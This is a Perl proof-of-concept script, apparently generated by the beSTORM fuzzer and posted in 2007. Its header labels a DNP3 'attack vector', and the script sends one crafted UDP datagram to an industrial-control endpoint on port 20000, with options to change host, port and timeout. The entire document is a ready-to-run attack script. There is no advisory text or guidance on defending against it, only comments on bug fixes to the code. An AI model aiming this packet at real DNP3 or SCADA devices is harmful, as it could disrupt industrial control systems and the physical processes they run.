Posted on 31 August 2007
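#!/usr/bin/perl
# Automatically generated by beSTORM(tm)
# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)
# Attack vector:
#   M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0
# Module:
#   DNP3
#
# Sends one fixed datagram (the generated test case in @commands) to
# host:port over UDP, waits up to $timeout seconds for any reply, prints
# whatever came back and exits.

use strict;
use warnings;
use Getopt::Std;
use IO::Socket::INET;

# Defaults; -H, -P and -t on the command line override them (see usage()).
my $host     = '192.168.4.52';
my $port     = 20000;
my $proto    = 'udp';
my $sockType = SOCK_DGRAM;
my $timeout  = 1;    # seconds; alarm() only honours whole seconds

# Install the Ctrl-C handler as a CODE reference. The original wrote
# `&abort`, which CALLS abort() right here at startup and stores its
# return value, so the script died with "User aborted operation" before
# a socket was ever opened.
$SIG{INT} = \&abort;

# Read command line arguments.
my %opt;
my $opt_string = 'hH:P:t:';
getopts( $opt_string, \%opt ) or usage();
usage() if defined $opt{h};
$host    = $opt{H} if defined $opt{H};
$port    = $opt{P} if defined $opt{P};
$timeout = $opt{t} if defined $opt{t};

# One datagram out, then wait for whatever comes back. The bytes are the
# generated test case; the backslashes had been stripped on the page copy,
# which also left the string literal unterminated.
my @commands = (
    {
        Command => 'Send',
        Data    => "\xC3\xC0\x01\x01\x00\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08",
    },
    { Command => 'Receive' },
);

###
# End user configurable part
###

#1. Create a new connection
my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => $proto,
    Type     => $sockType,
    Timeout  => $timeout,
) or die "socket error: $!\n";
print "connected to: $host:$port\n";
$sock->autoflush(1);
binmode $sock;

#2. communication part
foreach my $command (@commands) {
    if ( $command->{Command} eq 'Receive' ) {
        my $buf = receive( $sock, $timeout );
        print "received: [$buf]\n" if length $buf;
    }
    elsif ( $command->{Command} eq 'Send' ) {
        print "sending: [" . $command->{Data} . "]\n";
        send( $sock, $command->{Data}, 0 )
            or die "send failed, reason: $!\n";
    }
}

#3. Close connection
close($sock) or die "close failed: $!\n";

#The end

# receive($sock, $timeout)
#   Reads from $sock until a read waits longer than $timeout whole seconds,
#   the peer closes, or a read error occurs, and returns everything read so
#   far as one string ("" if nothing arrived). Any failure inside the read
#   other than the timeout is fatal.
sub receive {
    my ( $sock, $timeout ) = @_;
    my $buf = "";

    while (1) {
        my $chunk;
        # Example from perldoc -f alarm: SIGALRM fires while the read blocks
        # and the handler die()s out of the eval.
        eval {
            local $SIG{ALRM} = sub { die "timeout\n" };
            alarm $timeout;
            # sysread, not the buffered read(), so the alarm interrupts the
            # system call itself. On a UDP socket one sysread returns one
            # whole datagram; the original read 1 byte at a time, which
            # silently discarded the rest of every datagram.
            my $ret = sysread $sock, $chunk, 65535;
            alarm 0;
            if ( !defined $ret || $ret == 0 ) {    # error or EOF
                die "timeout\n";
            }
            $buf .= $chunk;
            1;
        } or do {
            my $err = $@ || "unknown error\n";
            alarm 0;    # never let a pending alarm outlive the eval
            # The "\n" on the die message matters: without it Perl appends
            # " at FILE line N." and the comparison below can never match.
            last if $err eq "timeout\n";
            die "receive aborted: $err";
        };
    }

    return $buf;
}

# abort()
#   SIGINT handler: close the socket if it was opened, then die.
sub abort {
    print "aborting...\n";
    close $sock if $sock;
    die "User aborted operation\n";
}

# usage()
#   Print the command line summary and exit 0.
sub usage {
    print "usage: $0 [-hHPt]\n";
    print "-h : this help message\n";
    print "-H : override default host - $host\n";
    print "-P : override default port - $port\n";
    print "-t : set socket timeout in seconds\n";
    exit 0;
}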